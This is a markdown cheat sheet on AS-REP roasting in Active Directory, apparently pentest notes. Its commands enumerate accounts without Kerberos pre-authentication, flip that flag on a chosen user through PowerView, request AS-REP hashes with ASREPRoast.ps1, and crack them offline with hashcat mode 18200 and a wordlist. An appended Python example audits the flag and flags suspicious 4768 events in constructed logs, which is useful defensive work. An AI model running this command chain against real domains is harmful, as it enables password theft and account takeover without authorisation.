# 🟢AS-REPS Roasting

## Enumerating accounts with Kerberos pre-auth disabled

First, load the PowerView PowerShell module:

```powershell
. .\Powerview_dev.ps1
```

Then retrieve all users with pre-authentication not required:

```powershell
Get-DomainUser -PreauthNotRequired -Verbose
```

Or list only their usernames:

```powershell
Get-DomainUser -PreauthNotRequired -Verbose | select samaccountname
```

## Enumerating permissions for a group

To find permissions for a specific group:

```powershell
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match "<groupname>"}
```

For a detailed list:

```powershell
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match "<groupname>"} | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl
```

## Setting pre-auth not required for a user

Load the PowerView script and run:

```powershell
. ./PowerView_dev.ps1
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
```

## Requesting the encrypted AS-REP for a user

After loading the ASREPRoast script:

```powershell
. ./ASREPRoast.ps1
Get-ASREPHash -Username <username> -Verbose
```

## Enumerating all users with pre-auth disabled and requesting their hashes

To enumerate and roast all users:

```powershell
Invoke-ASREPRoast -Verbose
Invoke-ASREPRoast -Verbose | fl
```

## Cracking the hash with hashcat

Finally, crack the retrieved hash with hashcat (mode 18200 is the Kerberos 5 AS-REP, etype 23 mode):

```powershell
hashcat -a 0 -m 18200 hash.txt rockyou.txt
```
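As an added example (not part of these notes), the defender-side view of the steps above in Python: the `userAccountControl` bit that the `-XOR` call flips (with the caveat that XOR toggles rather than sets it), plus detection over constructed 4768 (TGT requested) records for the no-pre-auth, RC4 AS-REP pattern that mode 18200 cracks. Field names follow the Windows 4768 event schema; the sample events, account names and IPs are constructed.

```python
# Added example, not from the original notes: audit and detection logic for
# the AS-REP roasting steps described above.
from collections import defaultdict

DONT_REQ_PREAUTH = 0x400000   # decimal 4194304, the value in the -XOR hashtable
NORMAL_ACCOUNT = 0x200        # baseline UAC of an ordinary enabled user

# Constructed sample 4768 events (not real logs). 10.0.0.5 pulls AS-REPs for
# two pre-auth-disabled accounts, which is what Invoke-ASREPRoast looks like
# from the domain controller's side; alice is a normal pre-authenticated logon.
SAMPLE_4768 = [
    {"EventID": 4768, "TargetUserName": "svc_backup", "PreAuthType": 0,
     "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.5"},
    {"EventID": 4768, "TargetUserName": "svc_sql", "PreAuthType": 0,
     "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.5"},
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": 2,
     "TicketEncryptionType": 0x12, "IpAddress": "10.0.0.7"},
]


def preauth_disabled(uac: int) -> bool:
    """True when the account does not require Kerberos pre-authentication."""
    return bool(uac & DONT_REQ_PREAUTH)


def xor_preauth_bit(uac: int) -> int:
    """Mirror Set-DomainObject -XOR: the bit is toggled, not set, so running it
    against an account that already carries the flag clears the flag again."""
    return uac ^ DONT_REQ_PREAUTH


def _is_roastable_asrep(e: dict) -> bool:
    # Pre-auth type 0 = no pre-authentication; etype 0x17 = RC4-HMAC, the
    # combination hashcat -m 18200 targets.
    return (e["EventID"] == 4768 and e["PreAuthType"] == 0
            and e["TicketEncryptionType"] == 0x17)


def asrep_roast_candidates(events) -> list:
    """Accounts whose TGT was issued without pre-auth in an RC4-encrypted reply."""
    return sorted({e["TargetUserName"] for e in events if _is_roastable_asrep(e)})


def roasting_sources(events, min_accounts: int = 2) -> list:
    """Client IPs that obtained such AS-REPs for at least min_accounts users."""
    per_ip = defaultdict(set)
    for e in events:
        if _is_roastable_asrep(e):
            per_ip[e["IpAddress"]].add(e["TargetUserName"])
    return sorted(ip for ip, users in per_ip.items() if len(users) >= min_accounts)
```

Feeding real 4768 exports into the same functions only requires mapping the event's field names onto the dict keys used here.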